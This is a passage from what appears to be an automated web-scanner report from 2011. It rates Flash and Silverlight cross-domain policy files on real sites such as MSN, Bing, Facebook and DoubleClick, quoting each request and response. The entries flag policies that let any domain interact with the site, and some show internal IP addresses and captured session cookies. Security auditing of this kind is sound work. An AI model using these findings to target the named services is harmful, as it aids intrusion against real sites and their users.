Set-Cookie: SRCHD=D=1744956&MS=1744956; expires=Thu, 25-Apr-2013 18:36:36 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=9E15B52EB3D04623BB2A34AE4C582277; expires=Thu, 25-Apr-2013 18:36:36 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110426; expires=Thu, 25-Apr-2013 18:36:36 GMT; domain=.bing.com; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.bing.com" he
...[SNIP]...
<allow-access-from domain="*.bing.com"/>
...[SNIP]...
<allow-access-from domain="blstc.msn.com"/>
...[SNIP]...
<allow-access-from domain="stc.sandblu.msn-int.com"/>
...[SNIP]...

6.20. http://investing.money.msn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://investing.money.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: investing.money.msn.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 Apr 2011 23:05:34 GMT
Accept-Ranges: bytes
ETag: "033a72066f9cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:12 GMT
Connection: close
Content-Length: 135

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.nl.msn.com" secure="true" />
</cross-domain-policy>

6.21. http://static.ak.connect.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.connect.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.32.145.112
X-Cnection: close
Date: Tue, 26 Apr 2011 21:03:25 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.22. http://www.actonsoftware.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.actonsoftware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.actonsoftware.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"596-1300332243000"
Last-Modified: Thu, 17 Mar 2011 03:24:03 GMT
Content-Type: application/xml
Content-Length: 596
Date: Tue, 26 Apr 2011 21:00:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.actonsoftware.com" />
<allow-access-from domain="actonsoftware.com" />
<allow-access-from domain="*.actonsoftware.com" />
<allow-access-from domain="www.act-on.com" />
<allow-access-from domain="act-on.com" />
<allow-access-from domain="*.act-on.com" />
<allow-access-from domain="www.act-on.net" />
<allow-access-from domain="act-on.net" />
<allow-access-from domain="*.act-on.net" />
...[SNIP]...

6.23. http://www.msn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.msn.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 26 Apr 2011 18:36:36 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA36
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
ETag: "80599becb6b4c71:803"
Last-Modified: Fri, 22 Jun 2007 10:20:15 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 214

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.msn.com" secure="true" />
<allow-access-from domain="bedrock" />
<allow-access-from domain="bedrockemea" />
</cross-
...[SNIP]...

6.24. http://citi.bridgetrack.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: citi.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 508
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:36:15 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="citi.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="172.16.181.69" />
   <allow-access-from domain="172.16.180.191" />
   <allow-access-from domain="banking.citibank.com" />
   <allow-access-from domain="sec-citi.bridgetrack.com" />
   <allow-access-from domain="citi-preview.bridgetrack.com" />
   <allow-access-from domain="www.sapientprojects.com" />
...[SNIP]...

6.25. http://data.moneycentral.msn.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.moneycentral.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.moneycentral.msn.com

Response

HTTP/1.1 200 OK
Content-Length: 381
Content-Type: text/xml
Last-Modified: Tue, 03 Feb 2009 07:27:42 GMT
Accept-Ranges: bytes
ETag: "583b68e6d085c91:6fa2"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:36:17 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="media.moneycentral.msn.com" secure="true"/>
<allow-access-from domain="moneycentral.msn.com" secure="true"/>
<allow-access-from domain="articles.moneycentral.msn.com" secure="true"/>
...[SNIP]...

6.26. http://freemanco.app5.hubspot.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freemanco.app5.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: freemanco.app5.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:ca8c"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:13:03 GMT
Connection: close
Set-Cookie: HUBSPOT159=554767532.0.0000; path=/

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

6.27. http://moneycentral.msn.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: moneycentral.msn.com

Response

HTTP/1.1 200 OK
Content-Length: 385
Content-Type: text/xml
Last-Modified: Tue, 08 Dec 2009 07:29:38 GMT
Accept-Ranges: bytes
ETag: "ce2e2033d877ca1:518a"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:36:12 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="articles.moneycentral.msn.com" secure="true"/>
<allow-access-from domain="blstb.msn.com" secure="true"/>
<allow-access-from domain="roadmaptoriches.moneycentral.msn.com" secure="true" />
...[SNIP]...

6.28. http://www.omniture.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.omniture.com

Response

HTTP/1.0 200 OK
Server: Omniture AWS/2.0.0
Last-Modified: Wed, 18 Aug 2010 04:52:06 GMT
ETag: "4c4094-280-d3cf2980"
Accept-Ranges: bytes
Content-Length: 640
xserver: www6.dmz
Content-Type: application/xml
Date: Tue, 26 Apr 2011 20:57:56 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.omniture.com" />
<allow-access-from domain="www.staging.omniture.com" />
<allow-access-from domain="assets.omniture.com" />
<allow-access-from domain="style.omniture.com" />
<allow-access-from domain="scripts.omniture.com" />
<allow-access-from domain="events.omniture.com" />
<allow-access-from domain="thelink.omniture.com" />
<allow-access-from domain="s7qa-appsdev.macromedia.com" />
<allow-access-from domain="s7qa-apps.macromedia.com" />
...[SNIP]...

7. Silverlight cross-domain policy  previous  next
There are 13 instances of this issue:


7.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Tue, 26 Apr 2011 18:36:13 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 27 Apr 2011 18:36:33 GMT
Date: Tue, 26 Apr 2011 18:36:33 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.3. http://b.voicefive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 27 Apr 2011 18:36:16 GMT
Date: Tue, 26 Apr 2011 18:36:16 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.4. http://c.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT
Accept-Ranges: bytes
ETag: "0ac2dec217dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:36 GMT
Connection: keep-alive
Content-Length: 340

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<g
...[SNIP]...

7.5. http://c.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT
Accept-Ranges: bytes
ETag: "0ac2dec217dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:35 GMT
Connection: keep-alive
Content-Length: 340

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<g
...[SNIP]...

7.6. http://img.widgets.video.s-msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.widgets.video.s-msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img.widgets.video.s-msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "5764ece6da29cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 348
Date: Tue, 26 Apr 2011 18:36:15 GMT
Last-Modified: Thu, 22 Jul 2010 20:17:26 GMT
Expires: Wed, 27 Apr 2011 18:36:15 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

7.7. http://rad.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 18 Mar 2011 23:41:08 GMT
Accept-Ranges: bytes
ETag: "024af4c5e5cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:16 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

7.8. http://spe.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Mon, 02 May 2011 08:07:20 GMT
Date: Tue, 26 Apr 2011 18:36:13 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.9. http://api.bing.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 348
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 26 Apr 2011 18:36:37 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-04-26T18%3a36%3a36; expires=Fri, 06-May-2011 18:36:36 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=50545F5A8928421BB01BB0B19336B7AC; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1744956&MS=1744956; expires=Thu, 25-Apr-2013 18:36:36 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=FEBA9C7121224C53B980FC7F5CE2D208; expires=Thu, 25-Apr-2013 18:36:36 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110426; expires=Thu, 25-Apr-2013 18:36:36 GMT; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*.bing.com"/>
</allow-from>

...[SNIP]...

7.10. http://data.moneycentral.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.moneycentral.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: data.moneycentral.msn.com

Response

HTTP/1.1 200 OK
Content-Length: 2066
Content-Type: text/xml
Last-Modified: Fri, 08 Apr 2011 00:17:04 GMT
Accept-Ranges: bytes
ETag: "2eb2dc4982f5cb1:6fa2"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:36:17 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
    <domain uri="http://moneycentral.msn.com"/><domain uri="http://uk.moneycentral.msn.com"/><domain uri="http://fr.moneycentral.msn.com"/><domain uri="http://de.moneycentral.msn.com"/><domain uri="http://jp.moneycentral.msn.com"/><domain uri="http://ca.moneycentral.msn.com"/><domain uri="http://it.money.msn.com"/><domain uri="http://es.money.msn.com"/><domain uri="http://nl.money.msn.com"/><domain uri="http://se.money.msn.com"/><domain uri="http://media.moneycentral.msn.com"/><domain uri="http://articles.moneycentral.msn.com"/><domain uri="http://kex-dev.microsoft.com"/><domain uri="http://knowledge-dev.microsoft.com"/><domain uri="http://knowledgeweb-dev.microsoft.com"/><domain uri="http://knowledge.microsoft.com"/><domain uri="http://kex.microsoft.com"/><domain uri="http://knowledgeweb.microsoft.com"/><domain uri="http://knowledge-ppe.microsoft.com"/><domain uri="http://kex-ppe.microsoft.com"/><domain uri="http://knowledgeweb-ppe.microsoft.com"/><domain uri="http://www.bing.com"/><domain uri="http://uxpartner.playmsn.com"/><domain uri="http://www.playmsn.com"/><domain uri="http://ux5.playmsn.com"/><domain uri="http://ux4.playmsn.com"/><domain uri="http://www.bing-int.com"/><domain uri="http://local.rx.msn-int.com"/><domain uri="http://stc.sandblu.msn-int.com"/><domain uri="http://stc.alphablu.msn-int.com"/><domain uri="http://amer.rx.msn-int.com"/><domain uri="http://test.rx.msn-int.com"/><domain uri="http://cert.lss.rx.msn-int.com"/><domain uri="http://efifteen.rx.msn-int.com"/><domain uri="http://perf.rx.msn-int.com"/><domain uri="http://investview.microsoft.com"/><domain uri="http://colsts.msn.com"/><domain uri="http://colstc.msn.com"/><domain uri="http://colstj.msn.com"/><domain uri="http://blstj.msn.com"/><domain uri="http://blstc.msn.com"/>
...[SNIP]...

7.11. http://money.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: money.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Last-Modified: Wed, 08 Dec 2010 00:00:36 GMT
ETag: "5fc3edf06a96cb1:803"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:34 GMT
Connection: keep-alive
Content-Length: 706

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://colstc.msn.com"/>
<domain uri="http://colstj.msn.com"/>
<domain uri="http://blstj.msn.com"/>
<domain uri="http://blstc.msn.com"/>
   <domain uri="http://moneycentral.msn.com"/>
<domain uri="http://beta.investing.money.msn.com"/>
<domain uri="http://investing.money.msn.com"/>
...[SNIP]...
<domain uri="http://stc.alphablu.msn-int.com"/>
...[SNIP]...

7.12. http://moneycentral.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: moneycentral.msn.com

Response

HTTP/1.1 200 OK
Content-Length: 821
Content-Type: text/xml
Last-Modified: Thu, 07 Apr 2011 22:00:07 GMT
Accept-Ranges: bytes
ETag: "6d6573286ff5cb1:168f5"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:36:13 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
    <domain uri="http://moneycentral.msn.com"/><domain uri="http://uk.moneycentral.msn.com"/><domain uri="http://fr.moneycentral.msn.com"/><domain uri="http://de.moneycentral.msn.com"/><domain uri="http://jp.moneycentral.msn.com"/><domain uri="http://ca.moneycentral.msn.com"/><domain uri="http://it.money.msn.com"/><domain uri="http://es.money.msn.com"/><domain uri="http://nl.money.msn.com"/><domain uri="http://se.money.msn.com"/><domain uri="http://investing.money.msn.com"/><domain uri="http://colstc.msn.com"/>
...[SNIP]...

7.13. http://services.money.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.money.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: services.money.msn.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 29 Mar 2011 23:21:38 GMT
Accept-Ranges: bytes
ETag: "06d75d68eecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:36:13 GMT
Connection: close
Content-Length: 649

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="http://appsrv.sandblu.msn-int.com"/>
<domain uri="http://colstc.msn.com"/>
<domain uri="http://colstj.msn.com"/>
<domain uri="http://blstj.msn.com"/>
<domain uri="http://blstc.msn.com"/>
...[SNIP]...

